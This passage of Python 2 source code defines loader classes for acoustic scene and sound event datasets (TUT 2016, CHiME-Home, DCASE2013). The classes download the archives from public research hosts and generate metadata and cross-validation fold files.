'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.4.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.4.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.5.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.5.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.6.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.6.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.7.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.7.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45739/files/TUT-acoustic-scenes-2016-development.audio.8.zip',
'local_package': os.path.join(self.local_path, 'TUT-acoustic-scenes-2016-development.audio.8.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
}
]
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Parameters
----------
nothing
Returns
-------
nothing
"""
if not os.path.isfile(self.meta_file):
section_header('Generating meta file for dataset')
meta_data = {}
for fold in xrange(1, self.evaluation_folds):
# Read train files in
train_filename = os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')
f = open(train_filename, 'rt')
reader = csv.reader(f, delimiter='\t')
for row in reader:
if row[0] not in meta_data:
meta_data[row[0]] = row[1]
f.close()
# Read evaluation files in
eval_filename = os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt')
f = open(eval_filename, 'rt')
reader = csv.reader(f, delimiter='\t')
for row in reader:
if row[0] not in meta_data:
meta_data[row[0]] = row[1]
f.close()
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in meta_data:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
label = meta_data[file]
writer.writerow((os.path.join(relative_path, raw_filename), label))
finally:
f.close()
foot()
class TUTAcousticScenes_2016_EvaluationSet(Dataset):
"""TUT Acoustic scenes 2016 evaluation dataset
This dataset is used in DCASE2016 - Task 1, Acoustic scene classification
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='TUT-acoustic-scenes-2016-evaluation')
self.authors = 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen'
self.name_remote = 'TUT Acoustic Scenes 2016, evaluation dataset'
self.url = 'http://www.cs.tut.fi/sgn/arg/dcase2016/download/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Roland Edirol R-09'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 1
self.package_list = [
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
]
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Parameters
----------
nothing
Returns
-------
nothing
"""
eval_filename = os.path.join(self.evaluation_setup_path, 'evaluate.txt')
if not os.path.isfile(self.meta_file) and os.path.isfile(eval_filename):
section_header('Generating meta file for dataset')
meta_data = {}
f = open(eval_filename, 'rt')
reader = csv.reader(f, delimiter='\t')
for row in reader:
if row[0] not in meta_data:
meta_data[row[0]] = row[1]
f.close()
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in meta_data:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
label = meta_data[file]
writer.writerow((os.path.join(relative_path, raw_filename), label))
finally:
f.close()
foot()
def train(self, fold=0):
raise IOError('Train setup not available.')
# TUT Sound events 2016 development and evaluation sets
class TUTSoundEvents_2016_DevelopmentSet(Dataset):
"""TUT Sound events 2016 development dataset
This dataset is used in DCASE2016 - Task 3, Sound event detection in real life audio
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='TUT-sound-events-2016-development')
self.authors = 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen'
self.name_remote = 'TUT Sound Events 2016, development dataset'
self.url = 'https://zenodo.org/record/45759'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Roland Edirol R-09'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 4
self.package_list = [
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio', 'residential_area'),
},
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio', 'home'),
},
{
'remote_package': 'https://zenodo.org/record/45759/files/TUT-sound-events-2016-development.doc.zip',
'local_package': os.path.join(self.local_path, 'TUT-sound-events-2016-development.doc.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45759/files/TUT-sound-events-2016-development.meta.zip',
'local_package': os.path.join(self.local_path, 'TUT-sound-events-2016-development.meta.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': 'https://zenodo.org/record/45759/files/TUT-sound-events-2016-development.audio.zip',
'local_package': os.path.join(self.local_path, 'TUT-sound-events-2016-development.audio.zip'),
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
]
def event_label_count(self, scene_label=None):
return len(self.event_labels(scene_label=scene_label))
def event_labels(self, scene_label=None):
labels = []
for item in self.meta:
if scene_label is None or item['scene_label'] == scene_label:
if 'event_label' in item and item['event_label'].rstrip() not in labels:
labels.append(item['event_label'].rstrip())
labels.sort()
return labels
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Parameters
----------
nothing
Returns
-------
nothing
"""
if not os.path.isfile(self.meta_file):
meta_file_handle = open(self.meta_file, 'wt')
try:
writer = csv.writer(meta_file_handle, delimiter='\t')
for filename in self.audio_files:
raw_path, raw_filename = os.path.split(filename)
relative_path = self.absolute_to_relative(raw_path)
scene_label = relative_path.replace('audio', '')[1:]
base_filename, file_extension = os.path.splitext(raw_filename)
annotation_filename = os.path.join(self.local_path, relative_path.replace('audio', 'meta'), base_filename + '.ann')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename),
scene_label,
float(annotation_file_row[0].replace(',', '.')),
float(annotation_file_row[1].replace(',', '.')),
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
finally:
meta_file_handle.close()
def train(self, fold=0, scene_label=None):
if fold not in self.evaluation_data_train:
self.evaluation_data_train[fold] = {}
for scene_label_ in self.scene_labels:
if scene_label_ not in self.evaluation_data_train[fold]:
self.evaluation_data_train[fold][scene_label_] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, scene_label_+'_fold' + str(fold) + '_train.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
if len(row) == 5:
# Event meta
self.evaluation_data_train[fold][scene_label_].append({
'file': self.relative_to_absolute_path(row[0]),
'scene_label': row[1],
'event_onset': float(row[2]),
'event_offset': float(row[3]),
'event_label': row[4]
})
else:
data = []
for item in self.meta:
if item['scene_label'] == scene_label_:
if 'event_label' in item:
data.append({'file': self.relative_to_absolute_path(item['file']),
'scene_label': item['scene_label'],
'event_onset': item['event_onset'],
'event_offset': item['event_offset'],
'event_label': item['event_label'],
})
self.evaluation_data_train[0][scene_label_] = data
if scene_label:
return self.evaluation_data_train[fold][scene_label]
else:
data = []
for scene_label_ in self.scene_labels:
for item in self.evaluation_data_train[fold][scene_label_]:
data.append(item)
return data
def test(self, fold=0, scene_label=None):
if fold not in self.evaluation_data_test:
self.evaluation_data_test[fold] = {}
for scene_label_ in self.scene_labels:
if scene_label_ not in self.evaluation_data_test[fold]:
self.evaluation_data_test[fold][scene_label_] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, scene_label_+'_fold' + str(fold) + '_test.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
self.evaluation_data_test[fold][scene_label_].append({'file': self.relative_to_absolute_path(row[0])})
else:
data = []
files = []
for item in self.meta:
if scene_label_ in item:
if self.relative_to_absolute_path(item['file']) not in files:
data.append({'file': self.relative_to_absolute_path(item['file'])})
files.append(self.relative_to_absolute_path(item['file']))
self.evaluation_data_test[0][scene_label_] = data
if scene_label:
return self.evaluation_data_test[fold][scene_label]
else:
data = []
for scene_label_ in self.scene_labels:
for item in self.evaluation_data_test[fold][scene_label_]:
data.append(item)
return data
class TUTSoundEvents_2016_EvaluationSet(Dataset):
"""TUT Sound events 2016 evaluation dataset
This dataset is used in DCASE2016 - Task 3, Sound event detection in real life audio
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='TUT-sound-events-2016-evaluation')
self.authors = 'Annamaria Mesaros, Toni Heittola, and Tuomas Virtanen'
self.name_remote = 'TUT Sound Events 2016, evaluation dataset'
self.url = 'http://www.cs.tut.fi/sgn/arg/dcase2016/download/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Roland Edirol R-09'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 1
self.package_list = [
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio'),
},
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio', 'home'),
},
{
'remote_package': None,
'local_package': None,
'local_audio_path': os.path.join(self.local_path, 'audio', 'residential_area'),
},
]
@property
def scene_labels(self):
labels = ['home', 'residential_area']
labels.sort()
return labels
def event_label_count(self, scene_label=None):
return len(self.event_labels(scene_label=scene_label))
def event_labels(self, scene_label=None):
labels = []
for item in self.meta:
if scene_label is None or item['scene_label'] == scene_label:
if 'event_label' in item and item['event_label'] not in labels:
labels.append(item['event_label'])
labels.sort()
return labels
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Parameters
----------
nothing
Returns
-------
nothing
"""
if not os.path.isfile(self.meta_file) and os.path.isdir(os.path.join(self.local_path,'meta')):
meta_file_handle = open(self.meta_file, 'wt')
try:
writer = csv.writer(meta_file_handle, delimiter='\t')
for filename in self.audio_files:
raw_path, raw_filename = os.path.split(filename)
relative_path = self.absolute_to_relative(raw_path)
scene_label = relative_path.replace('audio', '')[1:]
base_filename, file_extension = os.path.splitext(raw_filename)
annotation_filename = os.path.join(self.local_path, relative_path.replace('audio', 'meta'), base_filename + '.ann')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename),
scene_label,
float(annotation_file_row[0].replace(',', '.')),
float(annotation_file_row[1].replace(',', '.')),
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
finally:
meta_file_handle.close()
def train(self, fold=0, scene_label=None):
raise IOError('Train setup not available.')
def test(self, fold=0, scene_label=None):
if fold not in self.evaluation_data_test:
self.evaluation_data_test[fold] = {}
for scene_label_ in self.scene_labels:
if scene_label_ not in self.evaluation_data_test[fold]:
self.evaluation_data_test[fold][scene_label_] = []
if fold > 0:
with open(os.path.join(self.evaluation_setup_path, scene_label + '_fold' + str(fold) + '_test.txt'), 'rt') as f:
for row in csv.reader(f, delimiter='\t'):
self.evaluation_data_test[fold][scene_label_].append({'file': self.relative_to_absolute_path(row[0])})
else:
data = []
files = []
for item in self.audio_files:
if scene_label_ in item:
if self.relative_to_absolute_path(item) not in files:
data.append({'file': self.relative_to_absolute_path(item)})
files.append(self.relative_to_absolute_path(item))
self.evaluation_data_test[0][scene_label_] = data
if scene_label:
return self.evaluation_data_test[fold][scene_label]
else:
data = []
for scene_label_ in self.scene_labels:
for item in self.evaluation_data_test[fold][scene_label_]:
data.append(item)
return data
# CHIME home
class CHiMEHome_DomesticAudioTag_DevelopmentSet(Dataset):
def __init__(self, data_path=None):
Dataset.__init__(self, data_path=data_path, name = 'CHiMeHome-audiotag-development')
self.authors = 'Peter Foster, Siddharth Sigtia, Sacha Krstulovic, Jon Barker, and Mark Plumbley'
self.name_remote = 'The CHiME-Home dataset is a collection of annotated domestic environment audio recordings.'
self.url = ''
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Unknown'
self.evaluation_folds = 10
self.package_list = [
{
'remote_package': 'https://archive.org/download/chime-home/chime_home.tar.gz',
'local_package': os.path.join(self.local_path, 'chime_home.tar.gz'),
'local_audio_path': os.path.join(self.local_path, 'chime_home', 'chunks'),
},
]
@property
def audio_files(self):
"""Get all audio files in the dataset, use only file from CHime-Home-refined set.
Parameters
----------
nothing
Returns
-------
files : list
audio files
"""
if self.files is None:
refined_files = []
with open(os.path.join(self.local_path, 'chime_home', 'chunks_refined.csv'), 'rt') as f:
for row in csv.reader(f, delimiter=','):
refined_files.append(row[1])
self.files = []
for file in self.package_list:
path = file['local_audio_path']
if path:
l = os.listdir(path)
p = path.replace(self.local_path + os.path.sep, '')
for f in l:
fileName, fileExtension = os.path.splitext(f)
if fileExtension[1:] in self.audio_extensions and fileName in refined_files:
self.files.append(os.path.abspath(os.path.join(path, f)))
self.files.sort()
return self.files
def read_chunk_meta(self, meta_filename):
if os.path.isfile(meta_filename):
meta_file_handle = open(meta_filename, 'rt')
try:
meta_file_reader = csv.reader(meta_file_handle, delimiter=',')
data = {}
for meta_file_row in meta_file_reader:
data[meta_file_row[0]] = meta_file_row[1]
finally:
meta_file_handle.close()
return data
def tagcode_to_taglabel(self, tag):
map = {'c': 'child speech',
'm': 'adult male speech',
'f': 'adult female speech',
'v': 'video game/tv',
'p': 'percussive sound',
'b': 'broadband noise',
'o': 'other',
'S': 'silence/background',
'U': 'unidentifiable'
}
if tag in map:
return map[tag]
else:
return None
def on_after_extract(self):
"""After dataset packages are downloaded and extracted, meta-files are checked.
Legacy dataset meta files are converted to be compatible with current scheme.
Parameters
----------
nothing
Returns
-------
nothing
"""
if not os.path.isfile(self.meta_file):
section_header('Generating meta file for dataset')
scene_label = 'home'
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
base_filename, file_extension = os.path.splitext(raw_filename)
annotation_filename = os.path.join(raw_path, base_filename + '.csv')
meta_data = self.read_chunk_meta(annotation_filename)
tags = []
for i, tag in enumerate(meta_data['majorityvote']):
if tag is 'b':
print file
if tag is not 'S' and tag is not 'U':
tags.append(self.tagcode_to_taglabel(tag))
tags = ';'.join(tags)
writer.writerow(
(os.path.join(relative_path, raw_filename), scene_label, meta_data['majorityvote'], tags))
finally:
f.close()
foot()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
for target_tag in self.audio_tags:
if not os.path.isfile(os.path.join(self.evaluation_setup_path,
'fold' + str(fold) + '_' + target_tag.replace('/', '-').replace(' ',
'_') + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path,
'fold' + str(fold) + '_' + target_tag.replace('/', '-').replace(' ',
'_') + '_test.txt')):
all_folds_found = False
if not all_folds_found:
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
numpy.random.seed(475686)
kf = KFold(n=len(self.audio_files), n_folds=self.evaluation_folds, shuffle=True)
refined_files = []
with open(os.path.join(self.local_path, 'chime_home', 'chunks_refined.csv'), 'rt') as f:
for row in csv.reader(f, delimiter=','):
refined_files.append(self.relative_to_absolute_path(os.path.join('chime_home','chunks',row[1]+'.wav')))
fold = 1
files = numpy.array(refined_files)
for train_index, test_index in kf:
train_files = files[train_index]
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
item = self.file_meta(file)[0]
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],item['tag_string'], ';'.join(item['tags'])])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
writer.writerow([os.path.join(relative_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
item = self.file_meta(file)[0]
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],item['tag_string'], ';'.join(item['tags'])])
fold+= 1
# Legacy datasets
# =====================================================
# DCASE 2013
# =====================================================
class DCASE2013_Scene_DevelopmentSet(Dataset):
"""DCASE 2013 Acoustic scene classification, development dataset
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='DCASE2013-scene-development')
self.authors = 'Dimitrios Giannoulis, Emmanouil Benetos, Dan Stowell, and Mark Plumbley'
self.name_remote = 'IEEE AASP 2013 CASA Challenge - Public Dataset for Scene Classification Task'
self.url = 'http://www.elec.qmul.ac.uk/digitalmusic/sceneseventschallenge/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 5
self.package_list = [
{
'remote_package': 'http://c4dm.eecs.qmul.ac.uk/rdr/bitstream/handle/123456789/29/scenes_stereo.zip?sequence=1',
'local_package': os.path.join(self.local_path, 'scenes_stereo.zip'),
'local_audio_path': os.path.join(self.local_path, 'scenes_stereo'),
}
]
def on_after_extract(self):
# Make legacy dataset compatible with DCASE2016 dataset scheme
if not os.path.isfile(self.meta_file):
section_header('Generating meta file for dataset')
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
label = os.path.splitext(os.path.split(file)[1])[0][:-2]
writer.writerow((os.path.join(relative_path, raw_filename), label))
finally:
f.close()
foot()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt')):
all_folds_found = False
if not all_folds_found:
section_header('Generating evaluation setup files for dataset')
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
print self.evaluation_setup_path
classes = []
files = []
for item in self.meta:
classes.append(item['scene_label'])
files.append(item['file'])
files = numpy.array(files)
sss = StratifiedShuffleSplit(y=classes, n_iter=self.evaluation_folds, test_size=0.3, random_state=0)
fold = 1
for train_index, test_index in sss:
# print("TRAIN:", train_index, "TEST:", test_index)
train_files = files[train_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
label = self.file_meta(file)[0]['scene_label']
writer.writerow([os.path.join(raw_path, raw_filename), label])
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
writer.writerow([os.path.join(raw_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
label = self.file_meta(file)[0]['scene_label']
writer.writerow([os.path.join(raw_path, raw_filename), label])
fold += 1
foot()
class DCASE2013_Scene_EvaluationSet(DCASE2013_Scene_DevelopmentSet):
"""DCASE 2013 Acoustic scene classification, evaluation dataset
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='DCASE2013-scene-challenge')
self.authors = 'Dimitrios Giannoulis, Emmanouil Benetos, Dan Stowell, and Mark Plumbley'
self.name_remote = 'IEEE AASP 2013 CASA Challenge - Private Dataset for Scene Classification Task'
self.url = 'http://www.elec.qmul.ac.uk/digitalmusic/sceneseventschallenge/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 5
self.package_list = [
{
'remote_package': 'https://archive.org/download/dcase2013_scene_classification_testset/scenes_stereo_testset.zip',
'local_package': os.path.join(self.local_path, 'scenes_stereo_testset.zip'),
'local_audio_path': os.path.join(self.local_path, 'scenes_stereo_testset'),
}
]
def on_after_extract(self):
# Make legacy dataset compatible with DCASE2016 dataset scheme
if not os.path.isfile(self.meta_file) or 1:
section_header('Generating meta file for dataset')
f = open(self.meta_file, 'wt')
try:
writer = csv.writer(f, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
label = os.path.splitext(os.path.split(file)[1])[0][:-2]
writer.writerow((os.path.join(relative_path, raw_filename), label))
finally:
f.close()
foot()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt')):
all_folds_found = False
if not all_folds_found:
section_header('Generating evaluation setup files for dataset')
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
classes = []
files = []
for item in self.meta:
classes.append(item['scene_label'])
files.append(item['file'])
files = numpy.array(files)
sss = StratifiedShuffleSplit(y=classes, n_iter=self.evaluation_folds, test_size=0.3, random_state=0)
fold = 1
for train_index, test_index in sss:
train_files = files[train_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
label = self.file_meta(file)[0]['scene_label']
writer.writerow([os.path.join(raw_path, raw_filename), label])
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
writer.writerow([os.path.join(raw_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
label = self.file_meta(file)[0]['scene_label']
writer.writerow([os.path.join(raw_path, raw_filename), label])
fold += 1
foot()
# Sound events
class DCASE2013_Event_DevelopmentSet(Dataset):
"""DCASE 2013 Sound event detection, development dataset
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='DCASE2013-event-development')
self.authors = 'Dimitrios Giannoulis, Emmanouil Benetos, Dan Stowell, and Mark Plumbley'
self.name_remote = 'IEEE AASP CASA Challenge - Public Dataset for Event Detection Task'
self.url = 'http://www.elec.qmul.ac.uk/digitalmusic/sceneseventschallenge/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 5
self.package_list = [
{
'remote_package': 'https://archive.org/download/dcase2013_event_detection_development_OS/events_OS_development_v2.zip',
'local_package': os.path.join(self.local_path, 'events_OS_development_v2.zip'),
'local_audio_path': os.path.join(self.local_path, 'events_OS_development_v2'),
},
# {
# 'remote_package':'http://c4dm.eecs.qmul.ac.uk/rdr/bitstream/handle/123456789/28/singlesounds_annotation.zip?sequence=9',
# 'local_package': os.path.join(self.local_path, 'singlesounds_annotation.zip'),
# 'local_audio_path': None,
# },
# {
# 'remote_package':'http://c4dm.eecs.qmul.ac.uk/rdr/bitstream/handle/123456789/28/singlesounds_stereo.zip?sequence=7',
# 'local_package': os.path.join(self.local_path, 'singlesounds_stereo.zip'),
# 'local_audio_path': os.path.join(self.local_path, 'singlesounds_stereo'),
# },
]
def on_after_extract(self):
# Make legacy dataset compatible with DCASE2016 dataset scheme
scene_label = 'office'
if not os.path.isfile(self.meta_file):
meta_file_handle = open(self.meta_file, 'wt')
try:
writer = csv.writer(meta_file_handle, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
base_filename, file_extension = os.path.splitext(raw_filename)
if file.find('singlesounds_stereo') != -1:
annotation_filename = os.path.join(self.local_path, 'Annotation1', base_filename + '_bdm.txt')
label = base_filename[:-2]
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename), scene_label,
annotation_file_row[0], annotation_file_row[1], label, 'i'))
finally:
annotation_file_handle.close()
elif file.find('events_OS_development_v2') != -1:
annotation_filename = os.path.join(self.local_path, 'events_OS_development_v2',
base_filename + '_v2.txt')
if os.path.isfile(annotation_filename):
annotation_file_handle = open(annotation_filename, 'rt')
try:
annotation_file_reader = csv.reader(annotation_file_handle, delimiter='\t')
for annotation_file_row in annotation_file_reader:
writer.writerow((os.path.join(relative_path, raw_filename), scene_label,
annotation_file_row[0], annotation_file_row[1],
annotation_file_row[2], 'm'))
finally:
annotation_file_handle.close()
finally:
meta_file_handle.close()
all_folds_found = True
for fold in xrange(1, self.evaluation_folds):
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt')):
all_folds_found = False
if not os.path.isfile(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt')):
all_folds_found = False
if not all_folds_found:
# Construct training and testing sets. Isolated sound are used for training and
# polyphonic mixtures are used for testing.
if not os.path.isdir(self.evaluation_setup_path):
os.makedirs(self.evaluation_setup_path)
files = []
for item in self.meta:
if item['file'] not in files:
files.append(item['file'])
files = numpy.array(files)
f = numpy.zeros(len(files))
sss = StratifiedShuffleSplit(y=f, n_iter=5, test_size=0.3, random_state=0)
fold = 1
for train_index, test_index in sss:
# print("TRAIN:", train_index, "TEST:", test_index)
train_files = files[train_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_train.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in train_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
for item in self.meta:
if item['file'] == file:
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],
item['event_onset'], item['event_offset'], item['event_label']])
test_files = files[test_index]
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_test.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
writer.writerow([os.path.join(relative_path, raw_filename)])
with open(os.path.join(self.evaluation_setup_path, 'fold' + str(fold) + '_evaluate.txt'), 'wt') as f:
writer = csv.writer(f, delimiter='\t')
for file in test_files:
raw_path, raw_filename = os.path.split(file)
relative_path = raw_path.replace(self.local_path + os.path.sep, '')
for item in self.meta:
if item['file'] == file:
writer.writerow([os.path.join(relative_path, raw_filename), item['scene_label'],
item['event_onset'], item['event_offset'], item['event_label']])
fold += 1
class DCASE2013_Event_EvaluationSet(Dataset):
"""DCASE 2013 Sound event detection, evaluation dataset
"""
def __init__(self, data_path='data'):
Dataset.__init__(self, data_path=data_path, name='DCASE2013-event-challenge')
self.authors = 'Dimitrios Giannoulis, Emmanouil Benetos, Dan Stowell, and Mark Plumbley'
self.name_remote = 'IEEE AASP CASA Challenge - Private Dataset for Event Detection Task'
self.url = 'http://www.elec.qmul.ac.uk/digitalmusic/sceneseventschallenge/'
self.audio_source = 'Field recording'
self.audio_type = 'Natural'
self.recording_device_model = 'Unknown'
self.microphone_model = 'Soundman OKM II Klassik/studio A3 electret microphone'
self.evaluation_folds = 5
self.package_list = [
{
'remote_package': 'https://archive.org/download/dcase2013_event_detection_testset_OS/dcase2013_event_detection_testset_OS.zip',
'local_package': os.path.join(self.local_path, 'dcase2013_event_detection_testset_OS.zip'),
'local_audio_path': os.path.join(self.local_path, 'dcase2013_event_detection_testset_OS'),
}
]
def on_after_extract(self):
# Make legacy dataset compatible with DCASE2016 dataset scheme
scene_label = 'office'
if not os.path.isfile(self.meta_file):
meta_file_handle = open(self.meta_file, 'wt')
try:
writer = csv.writer(meta_file_handle, delimiter='\t')
for file in self.audio_files:
raw_path, raw_filename = os.path.split(file)
relative_path = self.absolute_to_relative(raw_path)
base_filename, file_extension = os.path.splitext(raw_filename)
if file.find('dcase2013_event_detection_testset_OS') != -1:
